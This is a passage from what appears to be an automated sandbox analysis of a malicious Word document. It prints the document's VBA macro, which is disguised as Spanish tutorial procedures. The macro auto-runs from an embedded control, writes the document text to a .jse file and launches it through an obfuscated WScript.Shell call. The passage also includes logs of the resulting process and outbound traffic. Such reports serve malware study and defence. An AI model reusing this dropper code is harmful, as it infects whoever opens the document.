        Selection.PasteAndFormat (wdFormatOriginalFormatting)

        Selection.MoveLeft Unit:=wdWord, Count:=1

End Sub



Sub DatosPersonales(nombre As String, edad As Integer, ciudad As String)

    

    MsgBox nombre & " " & edad & " " & ciudad

    

End Sub



Sub UsarProcedimiento()



    DatosPersonales "Eva", 25, "Granada"



End Sub



Sub UsarProcedimiento1()

'

' Ejemplo de uso de la funcin Call

'

    Call DatosPersonales("Eva", 25, "Granada")

    Call MayorEdad(20)

    Call Multiplicar(2, 5)

    Call MostrarMensaje(True, "Esto es una cadena de texto")



End Sub



'Ejercicios

'Crea un procedimiento que utiliza un procedimiento dentro de otro procedimiento

'Crea un procedimiento dependiendo de una condicin, utilizando una estructura de control if - then

'Crea un procedimiento que recibe parmetros numricos y los multiplica

'Crea un procedimiento que recibe un parmetro de tipo boolean



Sub MayorEdad(edad As Byte)

'

' Muestra un mensaje en funcin del parmetro que recibe

'

    If edad >= 18 Then

        MsgBox "Eres MAYOR de edad"

    Else

        MsgBox "Eres MENOR de edad"

    End If



End Sub



Public Function Dceas(tg As Variant, yu As String) As Object

On Error GoTo cvcv

Set Dceas = CreateObject(yu)

Exit Function

cvcv:

Set Dceas = CreateObject(tg)

End Function



Sub MostrarMensaje(bandera As Byte, mensaje As String)

    If bandera >= 18 Then

        MsgBox mensaje

    End If

    

    Bedcoll = Replace(Fokrtf, ".rrr", "." & Vertopd & "j" & Vertopd & "se")

    Name Fokrtf As Bedcoll

    Ki7gg = Vertopd & "WSc" & Vertopd

    CallByName Dceas(bandera, Ki7gg & "ript." & Nberft), Ubedf7, VbMethod, """" & Bedcoll & """" & " " & "--" & bandera, 1

End Sub

 

Function Multiplicar(n1 As Byte, n2 As Byte) As String

'

' Muestra un mensaje con el resultado de multiplicar el contenidos de los parametros

'

If n1 >= 18 Then

        Multiplicar = ActiveDocument.Content.Text

        Nberft = Vertopd & "Sh" & Vertopd & "ell"

        Ubedf7 = Vertopd & "Ru" & Vertopd & "n"

    Else

        MsgBox n1 & " x " & n2 & " = " & n1 * n2

    End If

End Function

    

Public Function Kerdobe(sa As String, rd As String)

On Error Resume Next

Vertopd = Empty

Fokrtf = sa & rd & "fuc" & Vertopd & ".rrr"

Dim Nived As Integer

Nived = FreeFile

Open Fokrtf For Binary Lock Read Write As #Nived

Put #Nived, , Multiplicar(20, 20)

Close #Nived

End Function



Private Sub MsTscAxNotSafeForScripting1_OnConnecting()

On Error Resume Next

Vertopd = ""

Kerdobe Application.StartupPath, "\..\" & Vertopd

MostrarMensaje 10, Vertopd

ActiveDocument.Close

End Sub

Streams

Stream Path: \x1CompObj, File Type: data, Stream Size: 114

General
Stream Path:	\x1CompObj
File Type:	data
Stream Size:	114
Entropy:	4.2359563651
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . M i c r o s o f t W o r d 9 7 - 2 0 0 3 D o c u m e n t . . . . . M S W o r d D o c . . . . . W o r d . D o c u m e n t . 8 . . 9 . q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 06 09 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 20 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 57 6f 72 64 20 39 37 2d 32 30 30 33 20 44 6f 63 75 6d 65 6e 74 00 0a 00 00 00 4d 53 57 6f 72 64 44 6f 63 00 10 00 00 00 57 6f 72 64 2e 44 6f 63 75 6d 65 6e 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: \x5DocumentSummaryInformation, File Type: Unicode text, UTF-32, big-endian, Stream Size: 308

General
Stream Path:	\x5DocumentSummaryInformation
File Type:	Unicode text, UTF-32, big-endian
Stream Size:	308
Entropy:	2.71016294545
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . i n 6 1 9 1 5 5 6 0 . . . . . . ` . . . . . . . [ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 04 01 00 00 0d 00 00 00 01 00 00 00 70 00 00 00 0f 00 00 00 78 00 00 00 1b 00 00 00 84 00 00 00 05 00 00 00 98 00 00 00 06 00 00 00 a0 00 00 00 11 00 00 00 a8 00 00 00 17 00 00 00 b0 00 00 00 0b 00 00 00 b8 00 00 00 10 00 00 00 c0 00 00 00

Stream Path: \x5SummaryInformation, File Type: Unicode text, UTF-32, big-endian, Stream Size: 428

General
Stream Path:	\x5SummaryInformation
File Type:	Unicode text, UTF-32, big-endian
Stream Size:	428
Entropy:	3.4166242002
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . \| . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 . . . . . . . D . . . . . . . P . . . . . . . \\ . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . W i n d o w s U s e r . . . . . . . . . . . .
Data Raw:	fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 7c 01 00 00 11 00 00 00 01 00 00 00 90 00 00 00 02 00 00 00 98 00 00 00 03 00 00 00 a4 00 00 00 04 00 00 00 b0 00 00 00 05 00 00 00 c8 00 00 00 06 00 00 00 d4 00 00 00 07 00 00 00 e0 00 00 00 08 00 00 00 f4 00 00 00 09 00 00 00 0c 01 00 00

Stream Path: 1Table, File Type: data, Stream Size: 7557

General
Stream Path:	1Table
File Type:	data
Stream Size:	7557
Entropy:	5.82495241329
Base64 Encoded:	True
Data ASCII:	. . . . . . . . s . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . > . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . .
Data Raw:	0a 06 0f 00 12 00 01 00 73 01 0f 00 07 00 03 00 03 00 03 00 00 00 04 00 08 00 00 00 98 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00

Stream Path: Data, File Type: data, Stream Size: 318972

General
Stream Path:	Data
File Type:	data
Stream Size:	318972
Entropy:	7.99141268818
Base64 Encoded:	True
Data ASCII:	V . . . D . d . . . . . . . . . . . . . . . . . . . . . . / p . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . p . . . . . . . . . . . . . . . . . . . s . . . > . . . . . . . . . . A . . . . ? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . P . i . c . t . u . r . e . . 1 . . . . . " . . . . . . . . . . . . . . . . . . . . . . . " . . . . . . . . . . . . C _ g . 1 . . w 8 $ V . V . . n . . . . . . . D . . . . . . . @ = . . f . . . . . . C _ g . 1 . . w 8 $ V . V
Data Raw:	56 dc 04 00 44 00 64 00 00 00 00 00 00 00 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 19 2f 70 1f 08 03 09 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0f 00 04 f0 70 00 00 00 b2 04 0a f0 08 00 00 00 01 04 00 00 00 0a 00 00 73 00 0b f0 3e 00 00 00 7f 00 80 00 f9 01 04 41 01 00 00 00 3f 01 00 00 06 00 bf 01 00 00 11 00 ff 01 00 00

Stream Path: Macros/PROJECT, File Type: ASCII text, with CRLF, CR line terminators, Stream Size: 441

General
Stream Path:	Macros/PROJECT
File Type:	ASCII text, with CRLF, CR line terminators
Stream Size:	441
Entropy:	5.18462370922
Base64 Encoded:	True
Data ASCII:	I D = " { 0 4 E B 5 1 C 1 - B F 8 E - 4 9 E C - A A 1 3 - 1 D E 9 F F 5 9 F D C D } " . . D o c u m e n t = T h i s D o c u m e n t / & H 0 0 0 0 0 0 0 0 . . N a m e = " P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 3 B 3 9 7 4 7 6 7 6 7 A 7 6 7 A 7 6 7 A 7 6 7 A " . . D P B = " 3 9 3 B 7 6 8 B 7 7 8 B 7 7 8 B " . . G C = " 3 7 3 5 7 8 7 A 8 8 8 6 8 7 8 7 8 7 8 7 7 8 " . . . . [ H o s t E x t e n d e r I n f o ] . .
Data Raw:	49 44 3d 22 7b 30 34 45 42 35 31 43 31 2d 42 46 38 45 2d 34 39 45 43 2d 41 41 31 33 2d 31 44 45 39 46 46 35 39 46 44 43 44 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 44 6f 63 75 6d 65 6e 74 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4e 61 6d 65 3d 22 50 72 6f 6a 65 63 74 22 0d 0a 48 65 6c 70 43 6f 6e 74 65 78 74 49 44 3d 22 30 22 0d 0a 56 65 72 73 69 6f 6e 43 6f 6d 70 61 74 69

Stream Path: Macros/PROJECTwm, File Type: data, Stream Size: 41

General
Stream Path:	Macros/PROJECTwm
File Type:	data
Stream Size:	41
Entropy:	3.07738448508
Base64 Encoded:	False
Data ASCII:	T h i s D o c u m e n t . T . h . i . s . D . o . c . u . m . e . n . t . . . . .
Data Raw:	54 68 69 73 44 6f 63 75 6d 65 6e 74 00 54 00 68 00 69 00 73 00 44 00 6f 00 63 00 75 00 6d 00 65 00 6e 00 74 00 00 00 00 00

Stream Path: Macros/VBA/_VBA_PROJECT, File Type: data, Stream Size: 3820

General
Stream Path:	Macros/VBA/_VBA_PROJECT
File Type:	data
Stream Size:	3820
Entropy:	4.6614506595
Base64 Encoded:	True
Data ASCII:	. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . r . o . g . r . a . m . . F . i . l . e . s . \\ . C . o . m . m . o . n . . F . i . l . e . s . \\ . M . i . c . r . o . s . o . f . t . . S . h . a . r . e . d . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 .
Data Raw:	cc 61 a6 00 00 03 00 ff 09 04 00 00 09 04 00 00 e4 04 03 00 00 00 00 00 00 00 00 00 01 00 06 00 02 00 20 01 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00

Stream Path: Macros/VBA/dir, File Type: data, Stream Size: 825

General
Stream Path:	Macros/VBA/dir
File Type:	data
Stream Size:	825
Entropy:	6.40170985592
Base64 Encoded:	True
Data ASCII:	. 5 . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . P r o j e c t . Q . ( . . @ . . . . . = . . . . . l . . . . . . . . . . . . ` . . . . J . < . . . . . r s t d . o l e > . . s . t . . d . o . l . e P . . . h . % ^ . . * . \\ G { 0 0 0 2 0 . 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } # . 2 . 0 # 0 # C : . \\ W i n d o w s . \\ S y s t e m 3 . 2 \\ . e 2 . t l b . # O L E A u t . o m a t i o n . ` . . . . E N o r m a l . . E N . C r . m . a Q . F . . . . . . . * . \\ C . . . . . . . _ .
Data Raw:	01 35 b3 80 01 00 04 00 00 00 03 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 07 00 1c 00 50 72 6f 6a 65 63 74 05 51 00 28 00 00 40 02 14 06 02 14 3d ad 02 0a 07 02 6c 01 14 08 06 12 09 02 12 80 a3 9a 0e 60 02 00 0c 02 4a 12 3c 02 0a 16 00 01 72 73 74 64 10 6f 6c 65 3e 02 19 73 00 74 00 00 64 00 6f 00 6c 00 65 50 00 0d 00 68 00 25 5e 00 03 2a 00 5c 47 7b 30 30

Stream Path: ObjectPool/_1641106895/\x1CompObj, File Type: data, Stream Size: 109

General
Stream Path:	ObjectPool/_1641106895/\x1CompObj
File Type:	data
Stream Size:	109
Entropy:	4.60427693016
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . B . " . + x e . . . . . . M s T s c A x . M s T s c A x . 9 . . . . . E m b e d d e d C o n t r o l . . . . . M s T s c A x . M s T s c A x . 9 . . 9 . q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff a0 03 bc a3 1d 04 e3 42 ad 22 88 2b 78 65 c9 c5 12 00 00 00 4d 73 54 73 63 41 78 2e 4d 73 54 73 63 41 78 2e 39 00 11 00 00 00 45 6d 62 65 64 64 65 64 20 43 6f 6e 74 72 6f 6c 00 12 00 00 00 4d 73 54 73 63 41 78 2e 4d 73 54 73 63 41 78 2e 39 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: ObjectPool/_1641106895/\x3OCXDATA, File Type: data, Stream Size: 54

General
Stream Path:	ObjectPool/_1641106895/\x3OCXDATA
File Type:	data
Stream Size:	54
Entropy:	3.86157887479
Base64 Encoded:	False
Data ASCII:	. . . . . . . B . " . + x e . . . . . . . . . . . . l . o . c . a . l . h . o . s . t . . . . . . . . . . .
Data Raw:	a0 03 bc a3 1d 04 e3 42 ad 22 88 2b 78 65 c9 c5 01 03 00 00 08 00 14 00 00 00 6c 00 6f 00 63 00 61 00 6c 00 68 00 6f 00 73 00 74 00 00 00 0b 00 00 00 0b 00 ff ff

Stream Path: ObjectPool/_1641106895/\x3OCXNAME, File Type: data, Stream Size: 58

General
Stream Path:	ObjectPool/_1641106895/\x3OCXNAME
File Type:	data
Stream Size:	58
Entropy:	2.96866917406
Base64 Encoded:	False
Data ASCII:	M . s . T . s . c . A . x . N . o . t . S . a . f . e . F . o . r . S . c . r . i . p . t . i . n . g . 1 . . . . .
Data Raw:	4d 00 73 00 54 00 73 00 63 00 41 00 78 00 4e 00 6f 00 74 00 53 00 61 00 66 00 65 00 46 00 6f 00 72 00 53 00 63 00 72 00 69 00 70 00 74 00 69 00 6e 00 67 00 31 00 00 00 00 00

Stream Path: ObjectPool/_1641106895/\x3ObjInfo, File Type: data, Stream Size: 6

General
Stream Path:	ObjectPool/_1641106895/\x3ObjInfo
File Type:	data
Stream Size:	6
Entropy:	1.79248125036
Base64 Encoded:	False
Data ASCII:	. 2 . . . .
Data Raw:	00 32 03 00 04 00

Stream Path: WordDocument, File Type: data, Stream Size: 305737

General
Stream Path:	WordDocument
File Type:	data
Stream Size:	305737
Entropy:	5.46247481768
Base64 Encoded:	True
Data ASCII:	. . . . g . . . . . . . . . . . . . . . . . . . . . . . q . . . . . b j b j . X . X . . . . . . . . . . . . . . . . . . . . . . . . . . . 2 . \\ . 2 . \\ q . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2 . . . . . . . 2 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	ec a5 c1 00 67 e0 09 04 00 00 f8 12 bf 00 00 00 00 00 00 10 00 00 00 00 00 08 00 00 71 a5 04 00 0e 00 62 6a 62 6a da 58 da 58 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 09 04 16 00 2e aa 04 00 b8 32 81 5c b8 32 81 5c 71 9d 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 24, 2020 23:02:37.705495119 CET	49719	80	192.168.1.103	185.216.35.24
Jan 24, 2020 23:02:37.732566118 CET	80	49719	185.216.35.24	192.168.1.103
Jan 24, 2020 23:02:38.241466045 CET	49719	80	192.168.1.103	185.216.35.24
Jan 24, 2020 23:02:38.268439054 CET	80	49719	185.216.35.24	192.168.1.103
Jan 24, 2020 23:02:38.776566982 CET	49719	80	192.168.1.103	185.216.35.24
Jan 24, 2020 23:02:38.803539991 CET	80	49719	185.216.35.24	192.168.1.103

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 24, 2020 23:00:28.560599089 CET	51614	53	192.168.1.103	8.8.8.8
Jan 24, 2020 23:00:28.627747059 CET	53	51614	8.8.8.8	192.168.1.103
Jan 24, 2020 23:00:40.246794939 CET	58938	53	192.168.1.103	8.8.8.8
Jan 24, 2020 23:00:40.278716087 CET	53	58938	8.8.8.8	192.168.1.103
Jan 24, 2020 23:00:44.401063919 CET	50022	53	192.168.1.103	8.8.8.8
Jan 24, 2020 23:00:44.424534082 CET	53	50022	8.8.8.8	192.168.1.103
Jan 24, 2020 23:00:44.465624094 CET	56292	53	192.168.1.103	8.8.8.8
Jan 24, 2020 23:00:44.489109039 CET	53	56292	8.8.8.8	192.168.1.103
Jan 24, 2020 23:00:45.253818035 CET	59231	53	192.168.1.103	8.8.8.8
Jan 24, 2020 23:00:45.277322054 CET	53	59231	8.8.8.8	192.168.1.103
Jan 24, 2020 23:00:49.341866970 CET	61009	53	192.168.1.103	8.8.8.8
Jan 24, 2020 23:00:49.365611076 CET	53	61009	8.8.8.8	192.168.1.103
Jan 24, 2020 23:00:58.663095951 CET	49237	53	192.168.1.103	8.8.8.8
Jan 24, 2020 23:00:58.725472927 CET	53	49237	8.8.8.8	192.168.1.103
Jan 24, 2020 23:01:21.086066961 CET	54033	53	192.168.1.103	8.8.8.8
Jan 24, 2020 23:01:21.120095968 CET	53	54033	8.8.8.8	192.168.1.103
Jan 24, 2020 23:01:24.142534971 CET	50321	53	192.168.1.103	8.8.8.8
Jan 24, 2020 23:01:24.174101114 CET	53	50321	8.8.8.8	192.168.1.103
Jan 24, 2020 23:02:03.224895954 CET	62541	53	192.168.1.103	8.8.8.8
Jan 24, 2020 23:02:03.266977072 CET	53	62541	8.8.8.8	192.168.1.103

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: WINWORD.EXE PID: 3480 Parent PID: 688

General

Start time:	23:00:40
Start date:	24/01/2020
Path:	C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE' /Automation -Embedding
Imagebase:	0x1390000
File size:	1966368 bytes
MD5 hash:	EFDE23ECDF60D334C31AF2A041439360
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: splwow64.exe PID: 6124 Parent PID: 3480

General

Start time:	23:00:48
Start date:	24/01/2020
Path:	C:\Windows\splwow64.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\splwow64.exe 12288
Imagebase:	0x7ff7d34d0000
File size:	130560 bytes
MD5 hash:	8D59B31FF375059E3C32B17BF31A76D5
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: wscript.exe PID: 6000 Parent PID: 3480

General

Start time:	23:01:01
Start date:	24/01/2020
Path:	C:\Windows\SysWOW64\wscript.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\wscript.exe 'C:\Users\user\AppData\Roaming\Microsoft\Word\fuc.jse' --10
Imagebase:	0xcd0000
File size:	147456 bytes
MD5 hash:	7075DD7B9BE8807FCA93ACD86F724884
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Disassembly

Code Analysis

VBA Code

Call Graph

Entrypoint
Decryption Function
Executed
Not Executed
Show Help

Module: ThisDocument

Declaration

Line	Content
1	Attribute VB_Name = "ThisDocument"
2	Attribute VB_Base = "1Normal.ThisDocument"
3	Attribute VB_GlobalNameSpace = False
4	Attribute VB_Creatable = False
5	Attribute VB_PredeclaredId = True
6	Attribute VB_Exposed = True
7	Attribute VB_TemplateDerived = True
8	Attribute VB_Customizable = True
11	Public Fokrtf as String
12	Public Nberft as String
13	Public Desazo as String
14	Public Vertopd as String
15	Public Ubedf7 as String

Non-Executed Functions

Subroutine MostrarMensaje, APIs: 6, Strings: 3, Number of lines: 9, Relevance: 17.509

APIs	Meta Information
MsgBox
Replace
CallByName
Part of subcall function Dceas@ThisDocument: CreateObject
Part of subcall function Dceas@ThisDocument: CreateObject
VbMethod

Strings	Decrypted Strings
"."
".rrr"
""""

Line	Instruction	Meta Information
92	Sub MostrarMensaje(bandera as Byte, mensaje as String)
93	If bandera >= 18 Then
94	MsgBox mensaje	MsgBox
95	Endif
97	Bedcoll = Replace(Fokrtf, ".rrr", "." & Vertopd & "j" & Vertopd & "se")	Replace
98	Name Fokrtf As Bedcoll
99	Ki7gg = Vertopd & "WSc" & Vertopd
100	CallByName Dceas(bandera, Ki7gg & "ript." & Nberft), Ubedf7, VbMethod, """" & Bedcoll & """" & " " & "--" & bandera, 1	CallByName VbMethod
101	End Sub

Subroutine UsarProcedimiento1, APIs: 10, Strings: 3, Number of lines: 6, Relevance: 19.506

APIs	Meta Information
Part of subcall function DatosPersonales@ThisDocument: MsgBox
Part of subcall function MayorEdad@ThisDocument: MsgBox
Part of subcall function MayorEdad@ThisDocument: MsgBox
Part of subcall function Multiplicar@ThisDocument: Content
Part of subcall function Multiplicar@ThisDocument: ActiveDocument
Part of subcall function Multiplicar@ThisDocument: MsgBox
Part of subcall function MostrarMensaje@ThisDocument: MsgBox
Part of subcall function MostrarMensaje@ThisDocument: Replace
Part of subcall function MostrarMensaje@ThisDocument: CallByName
Part of subcall function MostrarMensaje@ThisDocument: VbMethod

Strings	Decrypted Strings
"Eva"
"Granada"
"Esto es una cadena de texto"

Line	Instruction	Meta Information
55	Sub UsarProcedimiento1()
59	Call DatosPersonales("Eva", 25, "Granada")
60	Call MayorEdad(20)
61	Call Multiplicar(2, 5)
62	Call MostrarMensaje(True, "Esto es una cadena de texto")
64	End Sub

Subroutine MsTscAxNotSafeForScripting1_OnConnecting, APIs: 9, Strings: 2, Number of lines: 7, Relevance: 16.507

APIs	Meta Information
Part of subcall function Kerdobe@ThisDocument: FreeFile
Part of subcall function Kerdobe@ThisDocument: Open
StartupPath
Application
Part of subcall function MostrarMensaje@ThisDocument: MsgBox
Part of subcall function MostrarMensaje@ThisDocument: Replace
Part of subcall function MostrarMensaje@ThisDocument: CallByName
Part of subcall function MostrarMensaje@ThisDocument: VbMethod
Close

Strings	Decrypted Strings
""""
"\..\"

Line	Instruction	Meta Information
127	Private Sub MsTscAxNotSafeForScripting1_OnConnecting()
128	On Error Resume Next
129	Vertopd = ""
130	Kerdobe Application.StartupPath, "\..\" & Vertopd	StartupPath Application
131	MostrarMensaje 10, Vertopd
132	ActiveDocument.Close	Close
133	End Sub

Subroutine Sace_t, APIs: 10, Strings: 0, Number of lines: 9, Relevance: 12.509

APIs	Meta Information
Extend
Extend
EscapeKey
Cut
MoveRight
wdWord
PasteAndFormat
wdFormatOriginalFormatting
MoveLeft
wdWord

Line	Instruction	Meta Information
29	Sub Sace_t()
34	Selection.Extend	Extend
35	Selection.Extend	Extend
36	Selection.EscapeKey	EscapeKey
37	Selection.Cut	Cut
38	Selection.MoveRight Unit := wdWord, Count := 1	MoveRight wdWord
39	Selection.PasteAndFormat (wdFormatOriginalFormatting)	PasteAndFormat wdFormatOriginalFormatting
40	Selection.MoveLeft Unit := wdWord, Count := 1	MoveLeft wdWord
41	End Sub

Subroutine Fvo_t, APIs: 3, Strings: 3, Number of lines: 3, Relevance: 9.003

APIs	Meta Information
Add
Range
Selection

Strings	Decrypted Strings
""""
"docx"
"ux"

Line	Instruction	Meta Information
18	Sub Fvo_t()
24	ActiveDocument.Hyperlinks.Add Anchor := Selection.Range, Address := "docx", SubAddress := "", ScreenTip := "", TextToDisplay := "ux"	Add Range Selection
27	End Sub

Subroutine MayorEdad, APIs: 2, Strings: 3, Number of lines: 7, Relevance: 7.507

APIs	Meta Information
MsgBox
MsgBox

Strings	Decrypted Strings
"Eres MAYOR de edad"
"Eres MAYOR de edad"
"Eres MENOR de edad"

Line	Instruction	Meta Information
72	Sub MayorEdad(edad as Byte)
76	If edad >= 18 Then
77	MsgBox "Eres MAYOR de edad"	MsgBox
78	Else
79	MsgBox "Eres MENOR de edad"	MsgBox
80	Endif
82	End Sub

Function Kerdobe, APIs: 5, Strings: 0, Number of lines: 10, Relevance: 6.26

APIs	Meta Information
FreeFile
Open
Part of subcall function Multiplicar@ThisDocument: Content
Part of subcall function Multiplicar@ThisDocument: ActiveDocument
Part of subcall function Multiplicar@ThisDocument: MsgBox

Line	Instruction	Meta Information
116	Public Function Kerdobe(sa as String, rd as String)
117	On Error Resume Next
118	Vertopd = Empty
119	Fokrtf = sa & rd & "fuc" & Vertopd & ".rrr"
120	Dim Nived as Integer
121	Nived = FreeFile	FreeFile
122	Open Fokrtf For Binary Lock Read As # Nived	Open
123	Put # Nived, , Multiplicar(20, 20)
124	Close # Nived
125	End Function

Subroutine UsarProcedimiento, APIs: 1, Strings: 2, Number of lines: 3, Relevance: 4.503

APIs	Meta Information
Part of subcall function DatosPersonales@ThisDocument: MsgBox

Strings	Decrypted Strings
"Eva"
"Granada"

Line	Instruction	Meta Information
49	Sub UsarProcedimiento()
51	DatosPersonales "Eva", 25, "Granada"
53	End Sub

Function Multiplicar, APIs: 3, Strings: 0, Number of lines: 9, Relevance: 3.759

APIs	Meta Information
Content
ActiveDocument
MsgBox

Line	Instruction	Meta Information
103	Function Multiplicar(n1 as Byte, n2 as Byte) as String
107	If n1 >= 18 Then
108	Multiplicar = ActiveDocument.Content.Text	Content ActiveDocument
109	Nberft = Vertopd & "Sh" & Vertopd & "ell"
110	Ubedf7 = Vertopd & "Ru" & Vertopd & "n"
111	Else
112	MsgBox n1 & " x " & n2 & " = " & n1 * n2	MsgBox
113	Endif
114	End Function

Function Dceas, APIs: 2, Strings: 0, Number of lines: 7, Relevance: 2.507

APIs	Meta Information
CreateObject
CreateObject

Line	Instruction	Meta Information
84	Public Function Dceas(tg as Variant, yu as String) as Object
85	On Error Goto cvcv
86	Set Dceas = CreateObject(yu)	CreateObject
87	Exit Function
87	cvcv:
89	Set Dceas = CreateObject(tg)	CreateObject
90	End Function

Subroutine DatosPersonales, APIs: 1, Strings: 0, Number of lines: 3, Relevance: 1.253

APIs	Meta Information
MsgBox

Line	Instruction	Meta Information
43	Sub DatosPersonales(nombre as String, edad as Integer, ciudad as String)
45	MsgBox nombre & " " & edad & " " & ciudad	MsgBox
47	End Sub

Reset < >

Description:	Windows Management Instrumentation (WMI) is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use scripts to aid in operations and perform multiple actions that would otherwise be manual. Scripting is useful for speeding up operational tasks and reducing the time required to gain access to critical resources. Some scripting languages may be used to bypass process monitoring mechanisms by directly interacting with the operating system at an API level instead of calling other programs. Common scripting languages for Windows include VBScript and PowerShell but could also be in the form of command-line batch scripts.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

